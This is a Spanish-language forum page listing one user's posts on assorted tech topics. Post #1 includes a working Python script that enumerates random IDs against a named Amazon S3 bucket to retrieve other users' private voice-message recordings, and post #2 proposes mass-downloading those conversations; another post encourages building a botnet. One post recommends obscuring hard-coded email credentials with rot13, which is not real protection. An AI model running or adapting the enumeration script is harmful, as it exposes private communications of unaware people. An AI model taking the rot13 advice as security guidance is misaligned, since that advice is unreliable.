Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Tatoluckyfox

#1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los mp3 no vienen de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sino de un bucket de Amazon   ;D

Este es el Bucket xD: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.


Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
Código: python
import requests
import random

def random_string():

return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])

for x in range(500):

a = random_string()
req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
if req.status_code == 200:

print a + " existe.           - - - - - - - - - - - - -"

else:

print a + " no existe. -> " + str(req.status_code)


Y funciona tal que así.
#2
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.
#3
Según he visto por ahí, parece ser de .NET, actualízalo a la última versión disponible.
También he visto que, en caso menos probables pero no con menos importancia, podrían ser los drivers de la tarjeta gráfica que podrían estar desactivados.

Saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
EDIT: La fuente está un poco anticuada pero no creo que difiera mucho el problema.
#4
Dudas y pedidos generales / Re:pago seguro y anonimo
Febrero 04, 2017, 08:49:23 PM
Bitcoin, es bastante complicado rastrear los pagos y no se sabe la identidad de los participantes de un pago.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Así de primeras se me ocurre crear una plantilla en A4 con preguntas y cuadros que hay que rellenar en negro según la respuesta(un examen tipo test) y luego pasarlo por algún sistema de reconocimiento de imágenes(como puede ser Pillow en Python) y que este interaccione con una DB que registre los resultados. Lo malo de este sistema es que no se me ocurre como automatizar el reconocimiento del nombre de la persona que ha hecho el examen.
#6
Prueba a ejecutarlo con Python3
#7
Puedes abrir un server VNC y FTP, y poner la app de cámara grabando todo el rato. Entonces cuando te conectes verás la cámara y el FTP para acceder a las grabaciones. Un remedio casero que no está demás tener en cuenta.
#8
Dudas y pedidos generales / Re:Source Botnet + Consulta
Diciembre 17, 2016, 07:22:33 PM
Mírate esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

O yo te recomendaría programarla tú, yo lo he hecho en Python y es super divertido porque a medida que vas programando más ideas inundan tu mente y cada vez te enchufas más, y así podría seguir un rato... Además, si necesitas un src específico, ¿podrías concretar más sobre ellos?
#9
¿Y por qué no codificas las variables en, por ejemplo, rot13?

Aunque no sea tampoco ilegible, no está demás poner esta pequeña barrera para obstaculizar un poco.

Código: python
USER = 'zv_hfhnevb' # mi_usuario  codificada en rot13
PASSWORD = 'zv_pbagenfravn' # mi_contrasenia  codificada en rot13
SMTP_SERVER = 'smtp.gmail.com'

conn = SMTP_SSL(SMTP_SERVER)
conn.set_debuglevel(1)
conn.login(USER.decode('rot13'),PASSWORD.decode('rot13'))
...
#10
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Noviembre 14, 2016, 06:57:33 PM
Razer

¿CSV o XML?
#11
Obsoleto

Hola, el otro día estaba intentando abrir unos puertos en mi router Movistar Fibra Óptica cuando me encontré con que no me dejaba acceder al router. Entonces me puse a investigar las páginas por las que pasaba este login y me dí cuenta de que una pegaba un flash y te redirigía a una página de error que ponía Error, el router no responde. Descubrí este método para saltarme dicha página:

Paso 1.

Metes el número de teléfono en el Portal Alejandra


A continuación verás la pantalla de carga y pasados unos instantes saltará la página de error. Como es obvio, si no te salta esta página puedes dejar de leer.


Paso 2.

Si has sido observador, habrás visto que ha pasado por la página "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta". Bien, abre el código fuente de la página en este enlace No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y saldrá esto. Pulsa Ctrl+F para buscar y busca "/ConfigRouters".
.

Paso 3.

Bien, ahora buscas en los últimos buscados /ConfigRouters/Alejandra/MisConfiguraciones


Ahora pulsa en "Ver mi configuración actual"


Y te llevará a esta página y le das a volver(lo que está rodeado en negro "<- Mi configuración actual")


Paso 4.

Ahora pulsa en lo que está rodeado en azul("<- Mis configuraciones")


Y te debería salir la página principal con las opciones de configuración y la información básica de tu router. Si te sale la página de error, sigue intentando este paso hasta conseguirlo.


Y ya está. Ya has conseguido acceder a tu router sin necesidad de llamar al servicio técnico y estar 15 minutos para abrir un puerto ;)